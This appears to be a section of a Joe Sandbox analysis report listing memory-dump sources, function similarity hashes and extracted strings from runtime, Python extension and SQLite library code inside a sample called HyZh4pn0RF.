                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 349153199-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 52b2f3ae44961e8fa64ebf049b83306ffb60d0fe39ed8dedbb172a303ae7a2b1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF81C0E0F0A383E6F6529B75D4412B9A298AF85F80F0481B5FD0C53796DE3CE9478720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 349153199-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b369c7a3d4aeae5ad645d113c91f8a0bcd0fe91402e59b6f2cf4063d5a92ee2c
                                                                                                                                                                                                                                                                                                  • Instruction ID: fa347068b252684c4129ac4384422d1cd14a9f1c0cb7f23971b366d0d8b7f939
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b369c7a3d4aeae5ad645d113c91f8a0bcd0fe91402e59b6f2cf4063d5a92ee2c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3815DA0E0A24746FA5A9B7DDC712B9D290AF57780F44F13DDD2D836B6DE3CE841A600
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1835891032.00007FFBAB5F1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFBAB5F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1835837141.00007FFBAB5F0000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1835936380.00007FFBAB5F6000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1835980235.00007FFBAB5FB000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab5f0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 349153199-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 474c6b7a685372b53d5ee10a3ee998af2d98c0b67a4930f1a88a30a85650b8b9
                                                                                                                                                                                                                                                                                                  • Instruction ID: be7ccd7ad1c512499314c4eb15268035d63ed69f7f77651693b03768edc16c47
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 474c6b7a685372b53d5ee10a3ee998af2d98c0b67a4930f1a88a30a85650b8b9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2819EE0E0E24346FA529BB6D461679E2A4AF95780F44C035DD2D877B7DE3CE40DAB00
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocFromLong_Ssize_t$BoolCompareErr_Object_OccurredRich
                                                                                                                                                                                                                                                                                                  • String ID: __init__$charset_normalizer.md.CjkInvalidStopPlugin$ratio
                                                                                                                                                                                                                                                                                                  • API String ID: 871640449-4126926341
                                                                                                                                                                                                                                                                                                  • Opcode ID: 50dfb51dc545f733170bcd5f131fd8dec372b9381f754ea30373e4415d5ce4ea
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d8394cacc0de11158b537921d5f0147c4cd1b6c9c90d5e03c62c98bf6a0da2b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50dfb51dc545f733170bcd5f131fd8dec372b9381f754ea30373e4415d5ce4ea
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A35170B1E4B60641EE56AB7DEC102B9E3B0AF45B90F48A539DE3E077B5DE2CE4518340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$FromLong_Ssize_t$Err_ItemObject_Slice_String
                                                                                                                                                                                                                                                                                                  • String ID: interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                                                                                                  • API String ID: 575668516-2110327174
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e2baef39ba8fe060f07d6d6f0bced05c2d01185e87a098f7d4dafbc9954950d
                                                                                                                                                                                                                                                                                                  • Instruction ID: f73725a756d943c0b3aa3e679667d77d476c5f94368ba790dda8b7979c42bcd2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e2baef39ba8fe060f07d6d6f0bced05c2d01185e87a098f7d4dafbc9954950d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 844144B1A4BA4281EE564F79ED94278E3B0AF44B90F48A134CE3D467F4DF2DE4518700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
                                                                                                                                                                                                                                                                                                  • String ID: bool$feed
                                                                                                                                                                                                                                                                                                  • API String ID: 2189706420-2849697477
                                                                                                                                                                                                                                                                                                  • Opcode ID: 958a22a6337853555e897f1e5a14fcd0471710981ec55253fe3441e9c772aafb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 343ffb77bdf685348c177e0ba59bdd65810f45b477d51c7637dccd4cce37726c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 958a22a6337853555e897f1e5a14fcd0471710981ec55253fe3441e9c772aafb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B4142B1A4BA4681EE669B79ED60275F3B1FF44B80F08A036DE6D07775DE2DE4548300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Err_$Dict_ErrorFromItemLong_Number_ObjectObject_OccurredSsize_tVectorcallWith
                                                                                                                                                                                                                                                                                                  • String ID: bool$feed
                                                                                                                                                                                                                                                                                                  • API String ID: 2189706420-2849697477
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e0caade2916fc91190bf6248451af5af673b86bd580171c2b13f121ea62ae45
                                                                                                                                                                                                                                                                                                  • Instruction ID: 06f8c7cbc118da252b5ec39db07f5bd4cfb123a1d89ada9c6de4b292847b5edf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e0caade2916fc91190bf6248451af5af673b86bd580171c2b13f121ea62ae45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C74133B1A4BA0281EB529B79ED502B9E3B1FF48B80F44A035DE6E87775DF2CE4418741
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                                                                                                                                                                                                                                                                  • String ID: bool$feed
                                                                                                                                                                                                                                                                                                  • API String ID: 2902451266-2849697477
                                                                                                                                                                                                                                                                                                  • Opcode ID: f4f92837b73cd07083ecf196f641edd5c5d76e013ce287cc97f39c4dfbe217e1
                                                                                                                                                                                                                                                                                                  • Instruction ID: e67c08413edb88e7302821ef6edb5aa66f25fb99909f222626510b2335a3bd35
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4f92837b73cd07083ecf196f641edd5c5d76e013ce287cc97f39c4dfbe217e1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 794132B5A4BA4281EA679B79ED5427AE3B0FF44B80F44E03ACE6D07775DE2CE4418710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_ItemObject_$Dict_ErrorObjectOccurredVectorcallWith
                                                                                                                                                                                                                                                                                                  • String ID: bool$eligible
                                                                                                                                                                                                                                                                                                  • API String ID: 2902451266-3320767611
                                                                                                                                                                                                                                                                                                  • Opcode ID: eacaf991cd320d3b28d9c0a86148e8b297e2767c2de5e507dac64fabba49b49f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8bfbf1dfaa483107004404aa81d63592ba64c89afe136956dc1eb28df84c2e68
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eacaf991cd320d3b28d9c0a86148e8b297e2767c2de5e507dac64fabba49b49f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44313DB2A4BA4281EA568B79ED50279E7B1BF48B84F48E435DE2D47774DE2CE8418301
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Arg_$ArgumentCheckDigitErr_FromLongLong_PositionalStringUnicode_
                                                                                                                                                                                                                                                                                                  • String ID: a unicode character$argument 1$digit$not a digit
                                                                                                                                                                                                                                                                                                  • API String ID: 4245020737-4278345224
                                                                                                                                                                                                                                                                                                  • Opcode ID: aed245a8664a28b413df88f13d2b45979c93eee2f6ab32f7962ea5d8cc8ee058
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6aa95d9c2483a1ba6e8f429484bd2fe09e9c2b878a2d9249b276bf9bae38d83e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aed245a8664a28b413df88f13d2b45979c93eee2f6ab32f7962ea5d8cc8ee058
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9216BB1F0A642D5EF528F35E5401B923A8EF44F88F4484B5EE0E87664EE3CE4468721
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$PRAGMA "%w".page_count$misuse
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-3885987512
                                                                                                                                                                                                                                                                                                  • Opcode ID: 609fc2fb13e00cb4e20dc77efeb23423f801ae0726e0f45f7222155acbe24490
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2b9ae6a3ccd21b966272d3dcc6b56de6e833284c6ce8468906ab0a022b73e6f0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 609fc2fb13e00cb4e20dc77efeb23423f801ae0726e0f45f7222155acbe24490
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E129DA2A0BA42C1EA669B36D59037D73A9BF56F84F0841B1CE0D0B795DF3CE4478364
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-875588658
                                                                                                                                                                                                                                                                                                  • Opcode ID: d5dff3e84e1e23a8fc53c32058c43ab8a5c4bbbe5e67989a0810bec810ea8e84
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b4222a331532925202f4a1be2d3bf3face7500d787bf4013d237241a90404fa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5dff3e84e1e23a8fc53c32058c43ab8a5c4bbbe5e67989a0810bec810ea8e84
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAE182A2F0A656CAFB22CB74D4403BC37A4AB06749F044176DE0E62AD5EF3CE446C764
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFBAA5D613D, 00007FFBAA5D61B9, 00007FFBAA5D62C3
                                                                                                                                                                                                                                                                                                  • Cannot add a PRIMARY KEY column, xrefs: 00007FFBAA5D60C8
                                                                                                                                                                                                                                                                                                  • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFBAA5D635C
                                                                                                                                                                                                                                                                                                  • Cannot add a column with non-constant default, xrefs: 00007FFBAA5D61AF
                                                                                                                                                                                                                                                                                                  • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*', xrefs: 00007FFBAA5D6491
                                                                                                                                                                                                                                                                                                  • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFBAA5D6133
                                                                                                                                                                                                                                                                                                  • cannot add a STORED column, xrefs: 00007FFBAA5D62B4
                                                                                                                                                                                                                                                                                                  • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFBAA5D6155
                                                                                                                                                                                                                                                                                                  • Cannot add a UNIQUE column, xrefs: 00007FFBAA5D60E3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE quick_check GLOB 'CHECK*' OR quick_check GLOB 'NULL*'$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-3865411212
                                                                                                                                                                                                                                                                                                  • Opcode ID: fef009155f3ec238212e6e53dd1564833794cd72d0552d74e22e0b1999fb271b
                                                                                                                                                                                                                                                                                                  • Instruction ID: fd0f2beff9a4a65127448a9725a72ea1258c4ee57a3dc89b44e88b422a751002
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fef009155f3ec238212e6e53dd1564833794cd72d0552d74e22e0b1999fb271b
